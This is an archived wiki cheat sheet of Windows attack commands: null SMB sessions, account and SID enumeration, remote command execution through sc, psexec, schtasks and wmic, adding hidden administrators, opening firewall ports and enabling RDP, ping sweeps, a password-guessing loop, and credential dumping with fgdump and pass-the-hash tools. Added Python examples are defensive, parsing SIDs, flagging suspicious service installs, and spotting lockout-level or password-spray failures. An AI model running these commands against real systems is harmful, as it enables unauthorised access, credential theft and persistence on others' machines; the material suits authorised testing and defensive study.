WARNING: Wiki content is an archive, no promise about quality!
Recon
nslookup
Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
Interactive mode:
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
No recurse:
> set norecurse
> set recurse
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait for Nms before timing out (default 4000)
SMB session
Establishing a null session
net use \\<target> "" /u:""
Establishing an authenticated session
net use \\<target> <password> /u:<username>
Mount a share
net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>
Dropping SMB sessions
net use \\<target> /del
Dropping all SMB sessions (bad idea)
net use * /del
Pulling credentials (w/ SMB session)
Pulling credentials
enum -U <target>
enum -G <target>
user2sid
Output is a SID of the form S-X-Y-<target_sid>-<RID>; the final component is the RID
user2sid \\<target> <machine_name>
sid2user
sid2user takes the SID components as separate space-separated arguments (without the leading S-1-) rather than a dash-separated string
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
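Added example (Python, not from this wiki): a parser for the S-X-Y-...-RID strings that user2sid prints. It separates the domain/machine part of the SID from the RID, builds the space-separated argument form that sid2user expects, and labels the well-known RIDs (500 Administrator, 501 Guest, 512 Domain Admins, and so on) so a reviewer can tell built-in principals from accounts created after installation, which is why the loop above starts at RID 1000. The sample SID is constructed.

```python
"""Added example: parse the S-X-Y-...-RID SIDs that user2sid prints and build
the space-separated argument list that sid2user expects. Not part of the wiki."""
from dataclasses import dataclass
from typing import Tuple

# Well-known RIDs that identify built-in accounts and groups in a domain SID.
# Anything at 1000 or above was created after installation.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


@dataclass(frozen=True)
class Sid:
    revision: int                     # the X in S-X-Y-...; always 1 today
    authority: int                    # the Y; 5 is NT Authority
    subauthorities: Tuple[int, ...]   # domain/machine identifier plus the RID

    @property
    def rid(self) -> int:
        """Relative identifier: the last sub-authority."""
        return self.subauthorities[-1]

    @property
    def domain_sid(self) -> str:
        """The SID with the RID removed; shared by every account on the host or domain."""
        head = [self.revision, self.authority, *self.subauthorities[:-1]]
        return "S-" + "-".join(str(n) for n in head)

    def sid2user_args(self) -> str:
        """sid2user wants the components after 'S-1-' as separate space-separated arguments."""
        return " ".join(str(n) for n in (self.authority, *self.subauthorities))


def parse_sid(text: str) -> Sid:
    """Parse 'S-1-5-21-...-RID' into numeric components, rejecting malformed input."""
    parts = text.strip().split("-")
    if len(parts) < 4 or parts[0].upper() != "S":
        raise ValueError("not a SID: %r" % text)
    try:
        numbers = [int(p) for p in parts[1:]]
    except ValueError:
        raise ValueError("non-numeric SID component in %r" % text) from None
    if numbers[0] != 1:
        raise ValueError("unsupported SID revision %d" % numbers[0])
    return Sid(numbers[0], numbers[1], tuple(numbers[2:]))


def describe_rid(rid: int) -> str:
    """Classify a RID: well-known built-in, reserved low range, or post-install principal."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid >= 1000:
        return "account or group created after installation"
    return "reserved built-in range"


if __name__ == "__main__":
    # Constructed sample SID, not taken from any real system.
    sid = parse_sid("S-1-5-21-1004336348-1177238915-682003330-500")
    print(sid.domain_sid, sid.rid, describe_rid(sid.rid))
    print("sid2user arguments:", sid.sid2user_args())
```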
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service information
sc query <servicename>
sc qc <servicename>
Start a service
sc config <servicename> start= demand
sc start <servicename>
Starting telnet
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
Starting terminal services
sc query termservice
sc config termservice start= demand
sc start termservice
Using sc to invoke an executable
net use \\<target> <password> /u:<username>
sc \\<target> create <name> binpath= <command>
sc \\<target> start <name>
Making that service invoke another executable
sc \\<target> create <name> binpath= "cmd.exe /k <command>"
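Added example (Python, not from this wiki): on the defender's side the sc create / sc start sequence above leaves a "new service installed" record in the System log (Event ID 7045, with ServiceName, ImagePath, StartType and AccountName fields). This triage routine flags records whose image is a command interpreter, sits outside the usual program directories, or is demand-start, which is the shape a cmd.exe /k binpath produces. The event records are constructed samples, not real log data.

```python
"""Added example: triage 'new service installed' records (Event ID 7045 fields)
for the pattern that remote sc create commands produce. Not part of the wiki."""
import re
from typing import Dict, List

# Binaries that are interpreters rather than real service executables.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}

# Directories where legitimate service binaries normally live (lower-case).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed records in the shape of Event ID 7045 fields; not real log data.
SAMPLE_EVENTS = [
    {"ServiceName": "WinDefend",
     "ImagePath": r'"C:\Program Files\Windows Defender\MsMpEng.exe"',
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Dhcp",
     "ImagePath": r"%SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted",
     "StartType": "auto start", "AccountName": "NT AUTHORITY\\LocalService"},
    {"ServiceName": "svcupdt",
     "ImagePath": r"cmd.exe /k C:\Users\Public\run.bat",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "helper",
     "ImagePath": r"C:\Temp\helper.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
]


def image_binary(image_path: str) -> str:
    """Return the executable from an ImagePath, honouring quoted paths and expanding %SystemRoot%."""
    path = re.sub(r"%systemroot%", lambda m: "C:\\Windows", image_path.strip(), flags=re.IGNORECASE)
    if path.startswith('"'):
        end = path.find('"', 1)
        return path[1:end] if end > 0 else path[1:]
    return path.split()[0] if path else ""


def assess_service(event: Dict[str, str]) -> List[str]:
    """Return the reasons a service record looks like ad-hoc remote command execution."""
    reasons = []
    binary = image_binary(event.get("ImagePath", ""))
    base = binary.rsplit("\\", 1)[-1].lower()
    if base in SHELL_BINARIES:
        reasons.append("image is a command interpreter: " + base)
    if not binary.lower().startswith(TRUSTED_PREFIXES):
        reasons.append("image outside trusted directories: " + (binary or "<empty>"))
    # Only worth mentioning when something else is already off; many real services are demand-start.
    if reasons and event.get("StartType", "").lower() == "demand start":
        reasons.append("demand-start service, consistent with one-shot sc create / sc start use")
    return reasons


def suspicious_services(events) -> Dict[str, List[str]]:
    """Map service name -> findings for every record that has at least one."""
    found = {}
    for event in events:
        reasons = assess_service(event)
        if reasons:
            found[event["ServiceName"]] = reasons
    return found


if __name__ == "__main__":
    for name, reasons in suspicious_services(SAMPLE_EVENTS).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```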
Variables
Finding environmental variables
set
Finding a specific variable
set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add
Adding a user to the terminal services group
net localgroup "Remote Desktop Users" <username> /add
List administrators
net localgroup administrators
Add an administrator
net user <username> <password> /add
net localgroup administrators <username> /add
Remove a user from a group
net localgroup <group> <username> /del
Delete a user
net user <username> /del
Firewall interaction
Help
netsh /?
Show config
netsh firewall show config
Open a specific port
netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>
Remove the port opening
netsh firewall del portopening protocol = <TCP|UDP> port = <port>
Disable the firewall completely (bad idea)
netsh firewall set opmode disable
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Query a key
reg query <keyname>
Adding a key
reg add <keyname> /v <valuename> /t <type> /d <data>
Export data
reg export <keyname> <filename.reg>
Import data
reg import <filename.reg>
Enabling terminal services
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
netstat
Finding a port
netstat -an | find "<port>"
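Added example (Python, not from this wiki): find "<port>" matches the digits anywhere on the line, so find "445" also returns sockets on 4450 or 14450. The parser below reads netstat -an output into records, matches the local port exactly, and compares the set of listening ports against an allow-list, which is the check to run after any port-opening change. The sample output is constructed in netstat's layout, not captured from a real host.

```python
"""Added example: parse netstat -an output instead of substring-matching it with find.
Not part of the wiki."""
from typing import List, Set, Tuple

# Constructed output in the layout netstat -an prints; not captured from a real host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4450           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:49700     93.184.216.34:443      ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*
  UDP    [::1]:1900             *:*
"""


def lines_matching(output: str, needle: str) -> List[str]:
    """What  find "<port>"  actually does: any line containing the digits, port or not."""
    return [line for line in output.splitlines() if needle in line]


def split_endpoint(endpoint: str) -> Tuple[str, int]:
    """Split 'host:port'; IPv6 hosts are bracketed and contain colons, so split on the last one."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def parse_netstat(output: str) -> List[dict]:
    """Turn netstat -an text into records; the title, header and blank lines are skipped."""
    records = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        host, port = split_endpoint(fields[1])
        records.append({
            "proto": fields[0],
            "local_host": host,
            "local_port": port,
            "foreign": fields[2],
            "state": fields[3] if len(fields) > 3 else "",  # UDP has no state column
        })
    return records


def connections_on_port(output: str, port: int) -> List[dict]:
    """Exact local-port match, the intended meaning of  netstat -an | find "<port>"."""
    return [r for r in parse_netstat(output) if r["local_port"] == port]


def listening_ports(output: str) -> Set[Tuple[str, int]]:
    """(proto, port) pairs bound locally: TCP LISTENING sockets plus every UDP socket."""
    return {
        (r["proto"], r["local_port"])
        for r in parse_netstat(output)
        if (r["proto"] == "TCP" and r["state"] == "LISTENING") or r["proto"] == "UDP"
    }


def unexpected_listeners(output: str, allowed: Set[Tuple[str, int]]) -> Set[Tuple[str, int]]:
    """Listeners that are not on the allow-list."""
    return listening_ports(output) - allowed


if __name__ == "__main__":
    print("find-style matches for 445:", len(lines_matching(SAMPLE_NETSTAT, "445")))
    print("exact matches for 445:", len(connections_on_port(SAMPLE_NETSTAT, 445)))
    print("unexpected:", sorted(unexpected_listeners(SAMPLE_NETSTAT, {("TCP", 135), ("TCP", 445), ("UDP", 123)})))
```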
ipconfig
Dump the DNS cache
ipconfig /displaydns
arp
Dump the ARP cache
arp -a
Looping
/L loop
for /L %i in (<start>,<step>,<stop>) do <command>
Counting
for /L %i in (1,1,255) do @echo %i
Ping scanning
for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"
DNS bruteforce
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
/F loop
for /F ["<options>"] %i in (<stuff>) do <command>
Looping through passwords
for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause
Portscanning from a file
for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i
psexec
Using psexec (sysinternals)
- -s to run as system
- -c to copy the program to the target first
- -d to run in "detached" mode (no console)
psexec \\<target> -d -u <user> -p <password> <command>
at/schtasks
Starting the scheduler service
net use \\<target> <password> /u:<username>
sc [\\<target>] query schedule
sc [\\<target>] start schedule
Scheduling with at:
at [\\<target>] <HH:MM><A|P> <command>
Scheduling with schtasks
schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>
wmic
Running a program
wmic /node:<target> /user:<username> /password:<password> process call create <command>
List processes
wmic /node:<target> /user:<username> /password:<password> process list brief
wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete
Passwords
Account lockout
Info on Windows accounts
net accounts
net accounts /domain
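Added example (Python, not from this wiki), covering both the password loop in the for /F section and the lockout settings that net accounts reports here: given the lockout threshold and observation window, it checks a set of failed-logon records (Event ID 4625 style: time, target account, source address) for accounts that reach the threshold from one source, and separately for a single source failing against many different accounts, which the per-account threshold alone does not catch. The policy values are assumed and the records are constructed, not real log data.

```python
"""Added example: compare a burst of failed logons against the lockout threshold
and observation window that net accounts reports. Not part of the wiki."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Assumed values, as net accounts would print them on a hypothetical host.
LOCKOUT_THRESHOLD = 5                       # "Lockout threshold: 5"
OBSERVATION_WINDOW = timedelta(minutes=30)  # "Lockout observation window (minutes): 30"

# Constructed (timestamp, target user, source address) failures; not real log data.
FAILED_LOGONS = [
    ("2024-03-01T09:00:00", "svc_backup", "10.10.10.99"),
    ("2024-03-01T09:00:01", "svc_backup", "10.10.10.99"),
    ("2024-03-01T09:00:02", "svc_backup", "10.10.10.99"),
    ("2024-03-01T09:00:03", "svc_backup", "10.10.10.99"),
    ("2024-03-01T09:00:04", "svc_backup", "10.10.10.99"),
    ("2024-03-01T09:00:05", "svc_backup", "10.10.10.99"),
    ("2024-03-01T10:15:00", "alice", "10.10.10.77"),
    ("2024-03-01T10:15:20", "bob", "10.10.10.77"),
    ("2024-03-01T10:15:40", "carol", "10.10.10.77"),
    ("2024-03-01T10:16:00", "dave", "10.10.10.77"),
    ("2024-03-01T10:16:20", "erin", "10.10.10.77"),
    ("2024-03-01T08:30:00", "alice", "10.10.10.5"),   # a lone mistyped password
]


def max_failures_in_window(times: List[datetime], window: timedelta) -> int:
    """Largest number of failures that fall inside any span of length `window`."""
    times = sorted(times)
    best = 0
    for i, start in enumerate(times):
        j = i
        while j < len(times) and times[j] - start <= window:
            j += 1
        best = max(best, j - i)
    return best


def analyze_failed_logons(records, lockout_threshold: int, window: timedelta,
                          spray_min_users: int = 5) -> Dict[str, list]:
    """Accounts that reach the lockout threshold, and sources spreading failures across accounts."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    users_by_source: Dict[str, set] = defaultdict(set)
    for ts, user, source in records:
        t = datetime.fromisoformat(ts)
        by_pair[(user, source)].append(t)
        users_by_source[source].add(user)

    lockout_risk = []
    for (user, source), times in by_pair.items():
        n = max_failures_in_window(times, window)
        if n >= lockout_threshold:
            lockout_risk.append((user, source, n))

    spray_sources = [(src, len(users)) for src, users in users_by_source.items()
                     if len(users) >= spray_min_users]
    return {"lockout_risk": sorted(lockout_risk), "spray_sources": sorted(spray_sources)}


def demo() -> Dict[str, list]:
    """Run the analysis on the constructed sample with the assumed policy values."""
    return analyze_failed_logons(FAILED_LOGONS, LOCKOUT_THRESHOLD, OBSERVATION_WINDOW)


if __name__ == "__main__":
    print(demo())
```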
fgdump
Options
- -c -- don't get cached credentials
- -h <target>
- -u <username>
fgdump -c -h <target> -u <username>
Pass-the-hash toolkit (psh-toolkit)
Trend finally noticed/deleted these programs, so I don't have their parameters handy
- whosthere-exe
- genhash.exe
- iam.exe
Helpful hints
ftp
Download a file as anonymous
ftp -A -s:ftp-script.txt <host>
The script
get <file>
bye
An even better script that grabs everything in the base directory
prompt
mget .
bye